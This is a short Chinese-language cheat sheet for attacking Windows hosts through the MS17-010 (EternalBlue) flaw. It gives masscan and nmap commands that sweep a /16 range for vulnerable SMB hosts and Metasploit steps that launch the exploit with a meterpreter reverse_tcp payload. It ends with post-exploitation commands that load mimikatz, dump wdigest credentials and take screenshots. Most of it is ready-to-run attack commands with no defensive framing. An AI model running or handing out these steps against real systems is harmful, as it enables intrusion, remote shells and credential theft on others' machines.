一把梭指南
信息探测
参考资料
https://masterxsec.github.io/2017/05/27/Metasploit%E4%B8%AD%E7%9A%84MS17-010/
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue
其他 exploit
https://github.com/jflyup/goMS17-010
也可以使用 msf 自带的 scanner 探测 auxiliary/scanner/smb/smb_ms17_010
1 2 3
| sudo masscan -p445 192.168.1.1/16 > 445_open.txt vi 445_open.txt [ctrl+v G wwww d :q] nmap --script "smb-vuln-ms17*" -Pn -iL 445_open.txt > 17010.txt
|
漏洞利用
msfconsole
1 2 3 4 5 6 7 8 9 10
| use exploit/windows/smb/ms17_010_eternalblue show targets set TARGET <target-id> show options # set payload windows/x64/meterpreter/reverse_tcp # set payload windows/meterpreter/reverse_tcp set RHOST <remote_host> set LHOST <0.0.0.0> options exploit
|
Nmap
编译
从源码编译 Nmap compile nmap
1 2
| $ sudo apt-get install git wget build-essential checkinstall libpcre3-dev libssl-dev clang $ git clone https://github.com/nmap/nmap.git
|
Nmap 与 17010
1 2 3 4
| nmap 192.168.1.1 --script smb-vuln-ms17-010 nmap 192.168.1.1 -Pn -sn --script smb-vuln-ms17-010 nmap -iL list.txt -Pn -sn --script smb-vuln-ms17-010 nmap --script "smb-vuln-ms17*" -Pn -iL 445_open.txt > 17010.txt
|
https://www.darkoperator.com/installing-metasploit-in-ubunt/
sudo proxychains4 apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev
Meterpreter
1 2 3 4 5
| msf> load mimikatz wdigest screenshot sysinfo
|
